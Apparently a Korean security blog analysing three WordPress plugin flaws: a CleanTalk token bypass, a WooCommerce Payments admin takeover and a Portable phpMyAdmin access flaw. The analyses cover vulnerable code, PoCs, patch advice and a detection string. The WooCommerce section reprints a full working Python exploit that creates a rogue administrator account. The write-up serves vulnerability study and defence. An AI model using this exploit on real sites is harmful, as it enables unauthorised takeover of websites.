- Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.44

- API 키와 해시를 비교하여 토큰을 인증하는 방법이 존재
> 그러나 해당 함수에 API 키가 비어 있을 때 인증을 방지하기 위한 검증이 없음
> API 키가 플러그인에 구성되어 있지 않으면 비어 있는 해시 값과 일치하는 토큰을 사용해 인증을 우회할 수 있음

76 | $token  = strtolower(Request::get('spbc_remote_call_token'));
...
93 | // Check Access key
94 | if (
95 |    ($token === strtolower(md5($apbct->api_key)) ||
96 |     $token === strtolower(hash('sha256', $apbct->api_key))) ||
97 |    (self::checkWithoutToken() && self::isAllowedWithoutToken($action))
98 | ) {

3. 대응방안

- 벤더사 제공 업데이트 적용 [5][6]

> 두 취약점이 모두 해결된 6.45 버전으로 업데이트 권고

4. 참고

[1] https://cleantalk.org/
[2] https://www.wordfence.com/blog/2024/11/200000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-anti-spam-by-cleantalk-wordpress-plugin/
[3] https://nvd.nist.gov/vuln/detail/CVE-2024-10542
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-10781
[5] https://wordpress.org/plugins/cleantalk-spam-protect/#developers
[6] https://asec.ahnlab.com/ko/84781/
[7] https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html
[8] https://www.securityweek.com/critical-vulnerabilities-found-in-anti-spam-plugin-used-by-200000-wordpress-sites/
[9] https://www.boannews.com/media/view.asp?idx=134689&page=2&kind=1

1. WordPress WooCommerce Payments 플러그인

- WordPress란 사용자가 전문적인 기술과 지식 없이도 웹사이트에서 콘텐츠를 생성, 관리 및 수정할 수 있도록 도와주는 CMS(Contents Management System)

- WooCommerce Payments란 오픈 소스 전자상거래 솔루션

2. 취약점

- WordPress용 WooCommerce Payments 플러그인에 조작된 요청을 보내 인증되지 않은 사용자가 관리자 권한을 얻을 수 있는 취약점 (CVSS 9.8)

- 2023.07.14부터 지속적으로 공격이 이루어지고 있음

- 영향받는 버전
WordPress용 WooCommerce Payments 플러그인 버전 5.6.1 이하

2.1 분석

- 해당 취약점은 Platform-Checkout-Session.php의 init()에서 발생

> Line 25에서 요청 메시지의 쿠키를 사용해 현재 사용자 결정

add_filter( 'determine_current_user', [ __CLASS__, 'determine_current_user_for_platform_checkout' ] );

> Line 36~46 determinate_current_user_for_platform_checkout()에서 특정 헤더 값을 이용해 사용자 결정

⒜ 관련 헤더: X-WCPAY-PLATFORM-CHECKOUT-USER

⒝ 해당 헤더 값이 존재할 경우 검증없이 단순히 값을 반환하여 사용자를 결정

  public static function determine_current_user_for_platform_checkout( $user ) {
    if ( $user ) {
      return $user;
    }
    if ( ! isset( $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) || ! is_numeric( $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) ) {
      return null;
    }
    return (int) $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'];
  }

- Platform-Checkout-Session.php 중 취약점과 관련된 코드의 일부

<?php
/**
 * Class WC_Payments_Session.
 *
 * @package WooCommerce\Payments
 */

namespace WCPay\Platform_Checkout;

/**
 * Class responsible for handling platform checkout sessions.
 * This class should be loaded as soon as possible so the correct session is loaded.
 * So don't load it in the WC_Payments::init() function.
 */
class Platform_Checkout_Session {

  const PLATFORM_CHECKOUT_SESSION_COOKIE_NAME = 'platform_checkout_session';

  /**
   * Init the hooks.
   *
   * @return void
   */
  public static function init() {
    add_filter( 'determine_current_user', [ __CLASS__, 'determine_current_user_for_platform_checkout' ] );
    add_filter( 'woocommerce_cookie', [ __CLASS__, 'determine_session_cookie_for_platform_checkout' ] );
  }

  /**
   * Sets the current user as the user sent via the api from WooPay if present.
   *
   * @param \WP_User|null|int $user user to be used during the request.
   *
   * @return \WP_User|null|int
   */
  public static function determine_current_user_for_platform_checkout( $user ) {
    if ( $user ) {
      return $user;
    }

    if ( ! isset( $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) || ! is_numeric( $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) ) {
      return null;
    }

    return (int) $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'];
  }

  /**
   * Tells WC to use platform checkout session cookie if the header is present.
   *
   * @param string $cookie_hash Default cookie hash.
   *
   * @return string
   */
  public static function determine_session_cookie_for_platform_checkout( $cookie_hash ) {
    if ( isset( $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) && 0 === (int) $_SERVER['HTTP_X_WCPAY_PLATFORM_CHECKOUT_USER'] ) {
      return self::PLATFORM_CHECKOUT_SESSION_COOKIE_NAME;
    }

    return $cookie_hash;
  }
}

2.2 PoC

- 공개된 PoC의 동작은 다음과 같음

① readme.txt를 통해 대상 시스템에서 사용중인 WooCommerce Payments 플러그인의 버전을 확인해 취약 여부 확인

② 취약한 버전일 경우 /wp-json/wp/v2/users API 인터페이스를 활용해 사용자 추가

③ X-WCPAY-PLATFORM-CHECKOUT-USER 헤더 값을 1로 설정

> 일반적으로 첫 번째 사용자는 관리자이므로, 1로 설정하는 것으로 판단됨

④ 공격자가 관리자 권한을 가진 계정을 생성하게 됨

> determinate_current_user_for_platform_checkout()에 의해 검증없이 관리자 권한으로 설정됨

# CVE-2023-28121
# WooCommerce Payments Unauthorized Administrator Access Exploit 
# by Secragon
# PoC for educational/research purposes only
# Use it at your own risk!

import re
import sys
import urllib3
import requests
import argparse
from colorama import Fore, Style

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


username = "secragon"
password = "OffensiveSecurity123"
email = "exploit@secragon.com"

def check_version(target):
    
    print(Style.RESET_ALL + "Site version:", end=' ')
    try:
        r = requests.get(f"{target}/wp-content/plugins/woocommerce-payments/readme.txt", verify=False)
        version = re.search(r"Stable tag: (.*)", r.text).groups()[0]

    except:
        print(Fore.RED + f'error...')
        exit()


    if int(version.replace('.','')) < 562:
        print(Fore.GREEN + f'{version} - vulnerable!')
    else:
        print(Fore.RED + f'{version} - not vulnerable!')
        exit()

def add_admin(target):

    headers = {
        'User-Agent': 'Secragon Offensive Agent',
        'X-WCPAY-PLATFORM-CHECKOUT-USER': '1'
    }

    data = {
        'rest_route' : '/wp/v2/users',
        'username' : username,
        'email': email,
        'password': password,
        'roles':'administrator'
    }

    print(Style.RESET_ALL + "Getting session:", end =' ')

    s = requests.Session()
    try:
        r = s.get(f'{target}', headers=headers, verify=False)
        print(Fore.GREEN + f'done')
    except:
        print(Fore.RED + f'error...')
        exit()

    print(Style.RESET_ALL + "Adding a new admin:", end =' ')


    r = s.post(f'{target}', data=data, headers=headers, verify=False)
    if r.status_code == 201:
        print(Fore.GREEN + f'done')
    else:
        print(Fore.RED + f'error...')
        exit()


    print(Style.RESET_ALL + "All set! You can now login using the following credentials:")
    print(f'Username: {username}')
    print(f'Password: {password}')
    print()



print()
print(Fore.BLUE + "\t\t --- WooCommerce Payments exploit ---")
print("\t\t      (unauthorized admin access)")
print(Fore.RED + "\t\t\t\t\tby gbrsh@secragon & gnomer0x@secragon")
print(Style.RESET_ALL)


parser = argparse.ArgumentParser()

parser.add_argument('url', help='http://wphost')

if len(sys.argv) == 1:
    parser.print_help()
    print()
    exit()

args = parser.parse_args()

check_version(args.url)
add_admin(args.url)

- 공격자의 조작된 요청에의해 서버에서 201 Created 응답이 발생하며, 악성 계정이 정상적으로 생성

> 201 Created: POST, PUT 메소드 등으로 새로운 데이터를 서버에 생성하는 작업이 성공했음을 나타내는 상태코드

3. 대응방안

① 벤더사에서 제공하는 패치를 적용

- 해당 취약점은 2023.03.23 벤더사에서 패치를 배포

※ 패치 버전에서는 init() 포함되어 있는 Platform-Checkout-Session.php 파일을 삭제한 것으로 판단됨

4. 참고

[1] https://news.wp-kr.com/wordpress-start-guide/#index-wordpress
[2] https://woocommerce.com/payments/
[3] https://nvd.nist.gov/vuln/detail/CVE-2023-28121
[4] https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/
[5] https://developer.wordpress.org/reference/hooks/determine_current_user/
[6] https://github.com/gbrsh/CVE-2023-28121
[7] https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/
[8] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&nttId=71028&menuNo=205020
[9] https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/#google_vignette
[10] https://www.boannews.com/media/view.asp?idx=120266&page=1&kind=1 

1. WordPress

- 세계 최대의 오픈 소스 저작물 관리 시스템

- 오픈소스를 기반으로 한 설치형 블로그 또는 CMS(Content Managment System)

- PHP로 작성되었으며, MySQL 또는 마리아DB가 주로 사용

2. phpMyAdmin

- MySQL과 MariaDB를 위한 관리 도구

- PHP로 개발된 포터블 웹 애플리케이션

- 데이터베이스, 테이블, 필드, 열의 작성, 수정, 삭제, 사용자 및 사용 권한 관리 등의 다양한 작업을 수행할 수 있음

3. 취약점

- 플러그인 파일 경로에 직접 접근할 경우 기존 WordPress 세션(권한 여부)을 확인하지 않아 관리자 페이지에 접근이 가능

영향받는 버전 : WordPress용 1.3.1 이전의 Portable phpMyAdmin 플러그인

3.1 분석

- 공격자는 GET 메소드를 이용 portable-phpmyadmin 경로로 직접 접근

- [사진 2]의 요청을 통해 취약한 플러그인일 경우 권한 여부를 확인하지 않아 공격자가 관리자 페이지에 접근이 가능함

3.2 PoC

- 'wp-content/plugins/portable-phpmyadmin/wp-pma-mod' URL로 직접 접근

http://Dst/wp-content/plugins/portable-phpmyadmin/wp-pma-mod

4. 대응방안

4.1 서버측면

① Portable phpMyAdmin 1.3.1 혹은 그 이상 버전으로 업데이트 적용

4.2 네트워크 측면

① 탐지 정책 적용 및 차단

- PoC에서 확인되는 것처럼 플러그인 URL로 직접적인 요청 수행

- "/wp-content/plugins/portable-phpmyadmin/wp-pma-mod" 문자열을 탐지하는 정책을 적용

5. 참고

- https://nvd.nist.gov/vuln/detail/CVE-2012-5469

- https://www.exploit-db.com/exploits/23356

- https://www.tenable.com/plugins/nessus/64245

- https://www.tenable.com/cve/CVE-2012-5469/cpes

- https://www.lac.co.jp/english/report/pdf/JSOC_INSIGHT_vol23_en.pdf